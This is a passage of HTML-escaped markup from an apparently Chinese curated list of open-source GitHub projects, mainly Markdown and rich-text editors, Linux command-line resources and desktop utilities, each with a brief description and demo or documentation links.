            &lt;a href=&quot;https://github.com/markdoc/markdoc&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;markdoc&lt;/a&gt; - 一个强大、灵活、基于 &lt;code&gt;Markdown&lt;/code&gt; 的编辑器。&lt;a href=&quot;https://markdoc.dev/sandbox?mode=preview&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;在线体验&lt;/a&gt;
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/nuttyartist/notes&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;notes&lt;/a&gt; - 基于 &lt;code&gt;C++&lt;/code&gt; 实现的 &lt;code&gt;Markdown&lt;/code&gt; 编辑器。
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/wangeditor-team/wangEditor&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;wangEditor&lt;/a&gt; - 开源 &lt;code&gt;Web&lt;/code&gt; 富文本编辑器，开箱即用，配置简单，支持 &lt;code&gt;JS&lt;/code&gt;、&lt;code&gt;Vue&lt;/code&gt;、&lt;code&gt;React&lt;/code&gt;.&lt;a href=&quot;https://www.wangeditor.com/&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;在线文档&lt;/a&gt;
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/Hufe921/canvas-editor&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;canvas-editor&lt;/a&gt; - 基于 &lt;code&gt;Canvas/SVG&lt;/code&gt; 实现的富文本编辑器。&lt;a href=&quot;https://hufe.club/canvas-editor&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;在线体验&lt;/a&gt; &lt;a href=&quot;https://hufe.club/canvas-editor-docs/&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;在线文档&lt;/a&gt;
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/blossom-editor/blossom&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;blossom&lt;/a&gt; - 支持私有部署的云端存储双链笔记软件。&lt;a href=&quot;https://www.wangyunf.com/blossom-demo/#/&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;在线体验&lt;/a&gt; &lt;a href=&quot;https://www.wangyunf.com/blossom-doc/index.html&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;在线文档&lt;/a&gt;
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/mdnice/markdown-nice&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;markdown-nice&lt;/a&gt; - 支持主题设计的 &lt;code&gt;Markdown&lt;/code&gt; 编辑器，让排版变 Nice.&lt;a href=&quot;https://legacy.mdnice.com/&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;在线体验&lt;/a&gt;
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/pandao/editor.md&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;editor.md&lt;/a&gt; - 一款开源的、可嵌入的 &lt;code&gt;Markdown&lt;/code&gt; 在线编辑器（组件），基于 &lt;code&gt;CodeMirror&lt;/code&gt;、&lt;code&gt;jQuery&lt;/code&gt; 和 &lt;code&gt;Marked&lt;/code&gt; 构建。&lt;a href=&quot;http://editor.md.ipandao.com/&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;在线体验&lt;/a&gt;
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/ckeditor/ckeditor5&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;ckeditor5&lt;/a&gt; - 一个功能强大的富文本编辑器框架，具有模块化架构、现代集成和协作编辑等功能。&lt;a href=&quot;https://ckeditor.com/docs/ckeditor5/latest/getting-started/installation/quick-start.html&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;在线文档&lt;/a&gt;
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/slab/quill&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;quill&lt;/a&gt; - 一个现代的 &lt;code&gt;WYSIWYG&lt;/code&gt; 编辑器，具有兼容性和可扩展性。&lt;a href=&quot;https://quilljs.com/docs/quickstart&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;在线文档&lt;/a&gt;
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/tinymce/tinymce&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;tinymce&lt;/a&gt; - 富文本编辑 &lt;code&gt;JavaScript&lt;/code&gt; 库。&lt;a href=&quot;https://www.tiny.cloud/docs/tinymce/latest/&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;在线文档&lt;/a&gt;
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/codex-team/editor.js&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;editor.js&lt;/a&gt; - 块样式编辑器，采用的是独特的一套 &lt;code&gt;Json&lt;/code&gt; 数据结构。&lt;a href=&quot;https://editorjs.io/getting-started/&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;在线体验&lt;/a&gt;
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/ueberdosis/tiptap&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;tiptap&lt;/a&gt; - 面向 &lt;code&gt;Web&lt;/code&gt; 的编辑器框架。&lt;a href=&quot;https://tiptap.dev/introduction&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;在线文档&lt;/a&gt;
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/batnoter/batnoter&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;batnoter&lt;/a&gt; - 一个开源、基于 &lt;code&gt;Markdown&lt;/code&gt;、自托管的笔记 &lt;code&gt;Web&lt;/code&gt; 应用程序。
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/hedgedoc/hedgedoc&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;hedgedoc&lt;/a&gt; - 一个开源、基于网页、自托管的协作 &lt;code&gt;Markdown&lt;/code&gt; 编辑器。&lt;a href=&quot;https://docs.hedgedoc.org/setup/getting-started/&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;在线文档&lt;/a&gt;
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/tw93/MiaoYan&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;MiaoYan&lt;/a&gt; - 轻灵的 &lt;code&gt;Markdown&lt;/code&gt; 笔记本伴你写出妙言。
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/shenweiyan/Markdown2Html&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;Markdown2Html&lt;/a&gt; - 一款 &lt;code&gt;Markdown&lt;/code&gt; 转 &lt;code&gt;Html&lt;/code&gt;，支持掘金、知乎和微信公众号的编辑器。&lt;a href=&quot;https://md.weiyan.cc/&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;在线体验&lt;/a&gt;
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/gcui-art/markdown-to-image&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;markdown-to-image&lt;/a&gt; - &lt;code&gt;React&lt;/code&gt; 组件用于将 &lt;code&gt;Markdown&lt;/code&gt; 渲染为漂亮的社交媒体图片。&lt;a href=&quot;https://readpo.com/zh/poster&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;在线体验&lt;/a&gt;
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/marktext/marktext&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;marktext&lt;/a&gt; - 一个基于 &lt;code&gt;Vue&lt;/code&gt; + &lt;code&gt;Electron&lt;/code&gt; 的简单而优雅的开源 &lt;code&gt;markdown&lt;/code&gt; 编辑器。
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/rahuldkjain/github-profile-readme-generator&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;github-profile-readme-generator&lt;/a&gt; - &lt;code&gt;GitHub&lt;/code&gt; 主页介绍 &lt;code&gt;README &lt;/code&gt;生成器。&lt;a href=&quot;https://rahuldkjain.github.io/gh-profile-readme-generator/&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;在线体验&lt;/a&gt;
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/benweet/stackedit&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;stackedit&lt;/a&gt; - 在线浏览器 &lt;code&gt;Markdown&lt;/code&gt; 编辑器。&lt;a href=&quot;https://stackedit.io/app#&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;在线体验&lt;/a&gt;
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/Ileriayo/markdown-badges&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;markdown-badges&lt;/a&gt; - &lt;code&gt;Markdown&lt;/code&gt; 徽章。&lt;a href=&quot;https://ileriayo.github.io/markdown-badges/&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;在线体验&lt;/a&gt;
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/microsoft/markitdown&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;markitdown&lt;/a&gt; - 将文件和 &lt;code&gt;Office&lt;/code&gt; 文档转换为 &lt;code&gt;Markdown&lt;/code&gt; 的 &lt;code&gt;Python&lt;/code&gt; 工具。
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/mark-when/markwhen&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;markwhen&lt;/a&gt; - 一款从 &lt;code&gt;Markdown&lt;/code&gt; 文本创建美观的层级时间线的工具。&lt;a href=&quot;https://markwhen.com/&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;在线体验&lt;/a&gt;
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/umodoc/editor&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;editor&lt;/a&gt; - 一个基于 &lt;code&gt;Vue3&lt;/code&gt; 和 &lt;code&gt;Tiptap&lt;/code&gt; 的适合于国人使用的本土化开源文档编辑器。&lt;a href=&quot;https://demo.umodoc.com/editor?lang=zh-CN&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;在线体验&lt;/a&gt; &lt;a href=&quot;https://editor.umodoc.com/cn/docs&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;在线文档&lt;/a&gt;
        &lt;/p&gt;
    &lt;/li&gt;
&lt;/ul&gt;
&lt;hr/&gt;
&lt;h2 id=&quot;linux-项目&quot;&gt;
    &lt;a href=&quot;?id=linux-%e9%a1%b9%e7%9b%ae&quot; data-id=&quot;linux-项目&quot;&gt;&lt;code&gt;Linux&lt;/code&gt; 项目&lt;/a&gt;
&lt;/h2&gt;
&lt;ul class=&quot; list-paddingleft-2&quot;&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/jaywcjlove/linux-command&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;linux-command&lt;/a&gt; - &lt;code&gt;Linux&lt;/code&gt; &lt;strong&gt;命令大全&lt;/strong&gt;搜索工具，内容包含 &lt;code&gt;Linux&lt;/code&gt; 命令手册、详解、学习、搜集。&lt;a href=&quot;https://wangchujiang.com/linux-command/&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;在线体验&lt;/a&gt;
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/withfig/autocomplete&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;autocomplete&lt;/a&gt; - 为终端 &amp;amp; &lt;code&gt;shell&lt;/code&gt; 实现类似于 &lt;code&gt;IDE&lt;/code&gt; 一样的自动提示功能。
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/jlevy/the-art-of-command-line&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;the-art-of-command-line&lt;/a&gt; - 一文掌握所有命令行，70个 “冷门但有用”的命令行技巧。
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/electerm/electerm&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;electerm&lt;/a&gt; - 开源终端 &lt;code&gt;/ssh/telnet/serialport/sftp&lt;/code&gt; 客户端(&lt;code&gt;linux&lt;/code&gt;, &lt;code&gt;mac&lt;/code&gt;, &lt;code&gt;win&lt;/code&gt;)。
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/dushixiang/next-terminal&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;next-terminal&lt;/a&gt; - &lt;code&gt;Next Terminal&lt;/code&gt; 是一个简单好用安全的开源交互审计系统，支持 &lt;code&gt;RDP&lt;/code&gt;、&lt;code&gt;SSH&lt;/code&gt;、&lt;code&gt;VNC&lt;/code&gt;、&lt;code&gt;Telnet&lt;/code&gt;、&lt;code&gt;Kubernetes&lt;/code&gt; 协议。&lt;a href=&quot;https://next.typesafe.cn/&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;在线体验&lt;/a&gt;
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/dunwu/linux-tutorial&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;linux-tutorial&lt;/a&gt; - &lt;code&gt;Linux&lt;/code&gt; 教程，主要内容：&lt;code&gt;Linux&lt;/code&gt; 命令、&lt;code&gt;Linux&lt;/code&gt; 系统运维、软件运维、精选常用 &lt;code&gt;Shell&lt;/code&gt; 脚本。&lt;a href=&quot;https://dunwu.github.io/linux-tutorial/&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;在线体验&lt;/a&gt;
        &lt;/p&gt;
    &lt;/li&gt;
&lt;/ul&gt;
&lt;hr/&gt;
&lt;h2 id=&quot;软件项目&quot;&gt;
    &lt;a href=&quot;?id=%e8%bd%af%e4%bb%b6%e9%a1%b9%e7%9b%ae&quot; data-id=&quot;软件项目&quot;&gt;软件项目&lt;/a&gt;
&lt;/h2&gt;
&lt;ul class=&quot; list-paddingleft-2&quot;&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/Planshit/Tai&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;Tai&lt;/a&gt; - 在 &lt;code&gt;Windows&lt;/code&gt; 上统计软件使用时长和网站浏览时长。
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/Kyome22/RunCat_for_windows&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;RunCat_for_windows&lt;/a&gt; - 可以让你在 &lt;code&gt;Windows&lt;/code&gt; 操作系统的任务栏养一只小猫。
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/hellzerg/optimizer&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;optimizer&lt;/a&gt; - &lt;code&gt;Windows&lt;/code&gt; 优化器。
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/hiroi-sora/Umi-OCR&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;Umi-OCR&lt;/a&gt; - &lt;code&gt;OCR&lt;/code&gt; 图片转文字识别软件，完全离线。截屏/批量导入图片，支持多国语言、合并段落、竖排文字。可排除水印区域，提取干净的文本。
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/Uahh/ToastFish&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;ToastFish&lt;/a&gt; - 一个利用摸鱼时间&lt;strong&gt;背单词&lt;/strong&gt;的软件。
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/InkTimeRecord/TTime&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;TTime&lt;/a&gt; - 一款简洁高效的输入、截图、划词翻译软件。
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/Wox-launcher/Wox&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;Wox&lt;/a&gt; - &lt;code&gt;WoX&lt;/code&gt; 是一个简单的 &lt;code&gt;Windows&lt;/code&gt; 启动程序。这是 &lt;code&gt;Alfred&lt;/code&gt; 和 &lt;code&gt;Launchy&lt;/code&gt; 的替代品。
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/PantsuDango/Dango-Translator&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;Dango-Translator&lt;/a&gt; - 一款基于 &lt;code&gt;OCR&lt;/code&gt; 技术的翻译器。&lt;a href=&quot;https://dango-docs.ap-sh.starivercs.cn/#/&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;在线文档&lt;/a&gt;
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/usebruno/bruno&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;bruno&lt;/a&gt; - 用于探索和测试应用程序的开源集成开发环境（&lt;code&gt;postman&lt;/code&gt;/&lt;code&gt;insomnia&lt;/code&gt; 的轻量级替代品）。
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/FreeTubeApp/FreeTube&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;FreeTube&lt;/a&gt; - 一款开源桌面 &lt;code&gt;YouTube&lt;/code&gt; 播放器， 基于 &lt;code&gt;Electron&lt;/code&gt;，支持 &lt;code&gt;Windows&lt;/code&gt;、&lt;code&gt;Mac&lt;/code&gt; 和 &lt;code&gt;Linux&lt;/code&gt;.
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/localsend/localsend&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;localsend&lt;/a&gt; - 文件共享开源工具。
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/rocksdanister/lively&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;lively&lt;/a&gt; - 动画桌面壁纸软件。
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/mltframework/shotcut&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;shotcut&lt;/a&gt; - 跨平台 、开源的视频剪辑软件。
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/Tw1ddle/geometrize&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;geometrize&lt;/a&gt; - 一款桌面应用程序，可将图像几何化为几何基元。
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/AppFlowy-IO/AppFlowy&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;AppFlowy&lt;/a&gt; - 一款开源的笔记工具。
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/keiko233/clash-nyanpasu&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;clash-nyanpasu&lt;/a&gt; - 基于 &lt;code&gt;tauri&lt;/code&gt; 的 &lt;code&gt;Clash&lt;/code&gt; 图形化软件。
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/blackboxo/CleanMyWechat&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;CleanMyWechat&lt;/a&gt; - 自动删除 PC 端微信缓存数据，包括从所有聊天中自动下载的大量文件、视频、图片等数据内容，解放你的空间。
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/hluk/CopyQ&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;CopyQ&lt;/a&gt; - 具有高级功能的剪贴板管理器。&lt;a href=&quot;https://copyq.readthedocs.io/en/latest/&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;在线文档&lt;/a&gt;
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/videolan/vlc&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;vlc&lt;/a&gt; - 一款自由、开源的跨平台多媒体播放器及框架，可播放大多数多媒体文件，以及 DVD、音频 CD、VCD 及各类流媒体协议。
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/MonitorControl/MonitorControl&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;MonitorControl&lt;/a&gt; - 一款 &lt;code&gt;Mac&lt;/code&gt; 平台下的显示器亮度控制工具。
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/KurtBestor/Hitomi-Downloader&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;Hitomi-Downloader&lt;/a&gt; - 一个桌面实用程序，支持从各种网站下载图像/视频/音乐/文本等。
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/heyman/heynote&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;heynote&lt;/a&gt; - 方便开发人员专使用的便签软件。
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/KRTirtho/spotube&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;spotube&lt;/a&gt; - 一个开源跨多系统的&lt;strong&gt;音乐播放器&lt;/strong&gt;客户端。
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/BluePointLilac/ContextMenuManager&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;ContextMenuManager&lt;/a&gt; - 纯粹的 &lt;code&gt;Windows&lt;/code&gt; 右键菜单管理程序。&lt;a href=&quot;https://bluepointlilac.github.io/ContextMenuManager/&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;在线文档&lt;/a&gt;
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/dail8859/NotepadNext&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;NotepadNext&lt;/a&gt; - 跨平台的、重新实现的 &lt;code&gt;Notepad++&lt;/code&gt;。
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/cxasm/notepad--&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;notepad--&lt;/a&gt; - 一个支持 &lt;code&gt;windows&lt;/code&gt;/&lt;code&gt;linux&lt;/code&gt;/&lt;code&gt;mac&lt;/code&gt; 的&lt;strong&gt;文本编辑器&lt;/strong&gt;，目标是做中国人自己的编辑器，来自中国。
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/NickeManarin/ScreenToGif&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;ScreenToGif&lt;/a&gt; - 录屏工具，支持视频和 GIF.
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/kevin2li/PDF-Guru&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;PDF-Guru&lt;/a&gt; - 一个通用型 &lt;code&gt;PDF&lt;/code&gt; 文件处理工具，包含 &lt;code&gt;PDF&lt;/code&gt; 合并、拆分、旋转、水印、加密、转换等20多项常用功能。
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/MathewSachin/Captura&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;Captura&lt;/a&gt; - 一个功能强大、操作易用、基于 &lt;code&gt;.Net&lt;/code&gt; 实现的屏幕录制开源工具。
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/cteamx/Thief&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;Thief&lt;/a&gt; - 一款基于 &lt;code&gt;Electron&lt;/code&gt; 开发的跨平台多功能(&lt;code&gt;真正创新的&lt;/code&gt;)摸鱼软件。
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/zed-industries/zed&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;zed&lt;/a&gt; - 高性能多人代码编辑器。
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/uncle-novel/uncle-novel&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;uncle-novel&lt;/a&gt; - 一个全网小说下载器及阅读器，目录解析与书源结合，支持有声小说与文本小说，可下载 &lt;code&gt;mobi&lt;/code&gt;、&lt;code&gt;epub&lt;/code&gt;、&lt;code&gt;txt&lt;/code&gt; 格式文本小说。&lt;a href=&quot;https://uncle-novel.github.io/uncle-novel-official-site/&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;在线文档&lt;/a&gt;
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/zadam/trilium&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;trilium&lt;/a&gt; - 一个层次化的笔记应用程序，专注于建立大型个人知识库。
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/qarmin/czkawka&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;czkawka&lt;/a&gt; - 一款简单、快速且免费的应用程序，用于从计算机中删除不必要的文件。
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
